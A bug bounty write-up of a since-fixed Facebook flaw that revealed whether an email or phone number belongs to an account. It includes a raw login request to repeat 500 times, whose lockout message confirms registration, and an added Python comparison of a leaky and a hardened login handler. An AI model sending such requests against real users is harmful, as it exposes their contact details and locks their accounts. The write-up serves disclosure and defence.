[Facebook] Determine Email Address and Phone number of Users

A malicious user could have inferred contact point ownership (whether a given email address or phone number belongs to an account) for any user, regardless of the victim's privacy settings or their network relationship to the attacker.

POC - (attacker on a large network)
Repeat the following request 500 times with the target email address -
========================================
POST /login/device-based/regular/login/?login_attempt=1&next=https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https://www.instagram.com/accounts/signup/&state={"fbLoginKey":"XXX","fbLoginReturnURL":"/fxcal/disclosure/?next=/"}&scope=email&response_type=code,granted_scopes&locale=en_US&ret=login&fbapp_pres=0&logger_id=f952251a-c6c7-4721-9fa8-1ecc26f9c00d&tp=unspecified&cbt=1650191800804&lwv=100 HTTP/2
Host: www.facebook.com

jazoest=21013&lsd=AVoLtTx7Lyg&api_key=124024574287414&cancel_url=https://www.instagram.com/accounts/signup/?error=access_denied&error_code=200&error_description=Permissions+error&error_reason=user_denied&state={"fbLoginKey":"m0yfbr1fvsgfw6badajyhfvyherr5cb53lm5v1dus0bm1bctc47","fbLoginReturnURL":"/fxcal/disclosure/?next=/"}#_=_&display=page&isprivate=&return_session=&skip_api_login=1&signed_next=1&trynum=1&timezone=450&lgndim=eyJ3IjoxMjgwLCJoIjo3MjAsImF3IjoxMjgwLCJhaCI6NjgwLCJjIjoyNH0=&lgnrnd=040734__ylG&lgnjs=1650191800&email=victim@gmail.com&prefill_contact_point=vitcim@gmail.com&prefill_source=browser_dropdown&prefill_type=contact_point&first_prefill_source=browser_dropdown&first_prefill_type=contact_point&had_cp_prefilled=true&had_password_prefilled=false&encpass=LMAO
========================================

The payload insertion point is the password field in the request body (encpass=something_something_encrypted).

After that, any login request made with the target's username or phone number throws an error saying -
"You can't log in at the moment
To help keep your account safe, we've temporarily locked it.
Before you try logging in again, check your login info and
make sure that you're using your usual device on a secure network."
Any other email address, phone number or username throws an error saying - "Wrong credentials".
The lock message is only ever returned for a contact point that belongs to an existing account, so the difference between the two responses is enough to confirm whether an email address or phone number is registered.
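The response-message oracle described above, as an added example that is not Facebook's code nor the report author's: a toy login handler that reproduces the leak (the lock message is only reachable for registered contact points) beside a hardened handler that answers uniformly and throttles per submitted contact point whether or not it exists. The account store, lockout threshold, password hashing and message strings are all constructed for the demonstration; the `leaks_existence` self-check is a hypothetical helper a defender can point at their own handler.

```python
# Added example (not Facebook's or the report author's code): a toy login
# handler that reproduces the response-message oracle, beside a hardened
# handler that answers uniformly. Account data, threshold and messages are
# constructed for the demonstration.
import hashlib
import hmac
from dataclasses import dataclass

LOCKOUT_THRESHOLD = 5  # constructed; the report needed far more attempts

LOCKED_MSG = ("You can't log in at the moment. To help keep your account safe, "
              "we've temporarily locked it.")
WRONG_MSG = "Wrong credentials"
GENERIC_MSG = "Login failed. Check your details or try again later."


@dataclass
class Account:
    password_hash: bytes
    failed_attempts: int = 0
    locked: bool = False


def _hash(password: str) -> bytes:
    # Toy hash for the demo; a real system would use a slow KDF (argon2/scrypt).
    return hashlib.sha256(password.encode()).digest()


DUMMY_HASH = _hash("\x00dummy-for-unknown-accounts")


def new_state() -> dict:
    """Fresh server state: one registered contact point and an attempt table."""
    return {"users": {"victim@example.com": Account(_hash("correct horse battery"))},
            "attempts": {}}


def login_vulnerable(state: dict, contact_point: str, password: str) -> str:
    """Leaky handler: the lock message is only reachable for registered contact
    points, so after enough failures the message itself reveals existence."""
    acct = state["users"].get(contact_point)
    if acct is None:
        return WRONG_MSG
    if acct.locked:
        return LOCKED_MSG
    if hmac.compare_digest(acct.password_hash, _hash(password)):
        acct.failed_attempts = 0
        return "OK"
    acct.failed_attempts += 1
    if acct.failed_attempts >= LOCKOUT_THRESHOLD:
        acct.locked = True
        return LOCKED_MSG
    return WRONG_MSG


def login_hardened(state: dict, contact_point: str, password: str) -> str:
    """Uniform handler: unknown, wrong-password and locked cases all get the
    same message, attempts are throttled per submitted contact point whether
    or not it exists, and a dummy hash comparison keeps the code path the same."""
    attempts = state["attempts"].get(contact_point, 0) + 1
    state["attempts"][contact_point] = attempts
    acct = state["users"].get(contact_point)
    stored = acct.password_hash if acct is not None else DUMMY_HASH
    ok = hmac.compare_digest(stored, _hash(password))
    if acct is not None and not ok:
        acct.failed_attempts += 1
        if acct.failed_attempts >= LOCKOUT_THRESHOLD:
            acct.locked = True  # enforced server-side, never reported to the client
    if acct is None or acct.locked or not ok or attempts > LOCKOUT_THRESHOLD:
        return GENERIC_MSG
    acct.failed_attempts = 0
    return "OK"


def leaks_existence(login_fn, rounds: int = LOCKOUT_THRESHOLD + 1) -> bool:
    """Self-check for a login handler: send the same wrong password `rounds`
    times to a registered and to an unregistered contact point and report
    whether the final responses differ. True means the handler is an oracle."""
    state = new_state()
    last = {}
    for cp in ("victim@example.com", "nobody@example.com"):
        for _ in range(rounds):
            last[cp] = login_fn(state, cp, "not-the-password")
    return last["victim@example.com"] != last["nobody@example.com"]


if __name__ == "__main__":
    print("vulnerable handler leaks:", leaks_existence(login_vulnerable))  # True
    print("hardened handler leaks:  ", leaks_existence(login_hardened))    # False
```

The hardened handler still locks the real account after the threshold, it just never says so; the lock is enforced by refusing the correct password, and the throttle keyed on the submitted contact point applies equally to addresses that are not registered, so the count of attempts cannot be used to tell the two apart either.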
Timeline -
Reported - Sunday, April 17, 2022 
Triaged - Saturday, May 14, 2022
Fixed - Thursday, June 9, 2022
Rewarded - Tuesday, July 19, 2022 [with bonus]
